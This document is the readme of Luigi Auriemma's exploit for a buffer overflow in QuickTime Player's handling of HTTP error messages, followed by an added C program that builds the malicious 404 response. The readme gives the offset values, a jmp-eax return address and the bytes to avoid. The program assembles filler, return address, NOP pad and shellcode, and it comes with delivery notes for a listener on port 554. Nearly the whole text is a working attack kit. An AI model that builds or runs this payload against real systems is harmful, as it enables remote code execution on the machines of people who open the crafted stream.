Quicktime Player <= 7.3.1.70 HTTP error message buffer-overflow 0.1
by Luigi Auriemma
e-mail: aluigi@autistici.org
web:    aluigi.org
Usage: quicktimebof.exe <offset> <retaddr> <shellcode>
- offset: the position inside the error message (the "HTTP/1.1 404 " prefix is not counted) of the bytes that overwrite the return address. If in doubt, try 1926, 2134, 1870 and so on; the offset seems to change depending on the URL or the QTL file.
- retaddr: the return address you want to write there. A good value is 0x675b29eb: when the function returns, EAX points to the previous offset, i.e. to the overwritten return address itself, and 0x675b29eb holds a "jmp eax", so execution continues on the bytes of our own return address. "eb 29" decodes as "jmp 0x29", a short forward jump that lands past the overwritten area in the bytes that follow it. The tool fills that gap automatically when retaddr ends in 0xeb.
- shellcode: a file containing the shellcode to execute in C-style notation (something like "\x31\xc9\x83\xe9\xdd\xd9\xee\xd9..." and so on). Remember that the only bytes which must be avoided are 0x00, 0x0d and 0x0a. Use "" to run without shellcode.
Examples:
  quicktimebof 2134 0x41414141 ""
  quicktimebof 2134 0x675b29eb shellcode.txt
Remember that ports 554 and 7070 on your machine must be free (nothing else listening on them) and must not be filtered by a firewall!
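As an added illustration (this is not Luigi Auriemma's code and not the quicktimebof tool itself), the C program below builds the oversized error response the notes above describe: the "HTTP/1.1 404 " prefix that is excluded from the offset, <offset> filler bytes, the return address in little-endian order, the landing pad that a retaddr ending in 0xeb needs (the "eb XX" short jump lands XX + 2 bytes past the start of the address, 4 of which are the address itself), the shellcode parsed from C-style "\x.." text, and a check that none of 0x00, 0x0d or 0x0a slipped in. The trailing "\r\n\r\n" framing of the response and delivery through a separate listener on port 554 are assumptions of this example, not something the readme states.

```c
/* Added example, not part of the quicktimebof tool: build the malformed
 * "HTTP/1.1 404 <message>" response described in the readme and write it to
 * stdout.  Assumed: 13-byte status-line prefix, "\r\n\r\n" terminator.
 * Usage: ./qtbof_payload <offset> <retaddr> <shellcode.txt|""> > resp.bin */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_PAYLOAD 16384

/* Parse C-style "\x31\xc9..." text into raw bytes; quotes, whitespace and a
 * trailing ';' from copy-pasted C are skipped.  Returns byte count or -1. */
static int parse_c_shellcode(const char *s, unsigned char *out, size_t outsz)
{
    size_t n = 0;
    while (*s) {
        if (s[0] == '\\' && s[1] == 'x' && s[2] && s[3]) {
            char hex[3] = { s[2], s[3], 0 }, *end;
            long v = strtol(hex, &end, 16);
            if (*end || n >= outsz) return -1;
            out[n++] = (unsigned char)v;
            s += 4;
        } else if (strchr("\" \t\r\n;", *s)) {
            s++;
        } else {
            return -1;
        }
    }
    return (int)n;
}

/* 0x00 ends the C string, 0x0d/0x0a end the status line: none may appear. */
static int has_bad_byte(const unsigned char *p, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (p[i] == 0x00 || p[i] == 0x0d || p[i] == 0x0a) return 1;
    return 0;
}

/* Layout: prefix | offset filler | retaddr (LE) | landing pad | shellcode |
 * CRLFCRLF.  If retaddr ends in 0xeb its first two bytes form "jmp short XX",
 * reached through "jmp eax" with EAX at the return address, so the target is
 * XX + 2 bytes from the start of the address; the pad is that minus 4.
 * Returns payload length, or -1 on a bad byte, bad jump or overflow. */
static int build_payload(unsigned offset, uint32_t retaddr,
                         const unsigned char *sc, size_t sclen,
                         unsigned char *out, size_t outsz)
{
    static const char prefix[] = "HTTP/1.1 404 ";
    static const char tail[] = "\r\n\r\n";
    unsigned char ret[4] = { retaddr & 0xff, (retaddr >> 8) & 0xff,
                             (retaddr >> 16) & 0xff, (retaddr >> 24) & 0xff };
    size_t pad = 0, total;
    unsigned char *p = out;

    if (ret[0] == 0xeb) {
        if (ret[1] >= 0x80 || ret[1] + 2 < 4) return -1; /* backward jump, or lands inside retaddr */
        pad = (size_t)ret[1] + 2 - 4;
    }
    if (has_bad_byte(ret, 4) || has_bad_byte(sc, sclen)) return -1;
    total = (sizeof prefix - 1) + offset + 4 + pad + sclen + (sizeof tail - 1);
    if (total > outsz) return -1;

    memcpy(p, prefix, sizeof prefix - 1); p += sizeof prefix - 1;
    memset(p, 'A', offset);               p += offset;
    memcpy(p, ret, 4);                    p += 4;
    memset(p, 0x90, pad);                 p += pad;   /* NOP sled up to the jump target */
    memcpy(p, sc, sclen);                 p += sclen;
    memcpy(p, tail, sizeof tail - 1);     p += sizeof tail - 1;
    return (int)(p - out);
}

/* Builds the readme's example (offset 2134, retaddr 0x675b29eb) with a
 * constructed 3-byte stand-in for shellcode and verifies that the short jump
 * encoded in the address lands on its first byte.  Returns the payload
 * length on success, 0 on failure. */
static int self_check(void)
{
    static const unsigned char sc[] = { 0x31, 0xc9, 0x83 };  /* constructed sample */
    unsigned char buf[MAX_PAYLOAD];
    int len = build_payload(2134, 0x675b29eb, sc, sizeof sc, buf, sizeof buf);
    size_t ret_at = 13 + 2134;                       /* where the return address sits */
    size_t target = ret_at + 2 + buf[ret_at + 1];    /* jmp short: next insn + disp */
    if (len < 0 || buf[ret_at] != 0xeb || buf[target] != sc[0]) return 0;
    return len;
}

int main(int argc, char **argv)
{
    static unsigned char sc[MAX_PAYLOAD], out[MAX_PAYLOAD];
    static char text[MAX_PAYLOAD];
    int sclen = 0, len;
    if (argc != 4) {
        fprintf(stderr, "usage: %s <offset> <retaddr> <shellcode.txt|\"\">\n", argv[0]);
        return 1;
    }
    if (argv[3][0]) {                          /* "" means no shellcode, as in the readme */
        FILE *f = fopen(argv[3], "rb");
        if (!f) { perror(argv[3]); return 1; }
        text[fread(text, 1, sizeof text - 1, f)] = 0;
        fclose(f);
        if ((sclen = parse_c_shellcode(text, sc, sizeof sc)) < 0) {
            fprintf(stderr, "malformed shellcode file\n");
            return 1;
        }
    }
    len = build_payload((unsigned)strtoul(argv[1], NULL, 0), (uint32_t)strtoul(argv[2], NULL, 0),
                        sc, (size_t)sclen, out, sizeof out);
    if (len < 0) {
        fprintf(stderr, "payload rejected: bad byte (00/0d/0a), bad jump or too long\n");
        return 1;
    }
    fwrite(out, 1, (size_t)len, stdout);
    return 0;
}
```

Build with cc -std=c99; the resulting resp.bin is what a listener on port 554 would answer QuickTime with. The point of the example is the byte layout and the jump arithmetic: with 0x675b29eb the "eb 29" bytes jump 0x29 + 2 = 43 bytes past the start of the return address, so 39 filler bytes follow the 4 address bytes before the shellcode begins, and a displacement byte of 0x80 or above would be a backward jump and is rejected.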
http://www.vfocus.net/art/20080115/3310.html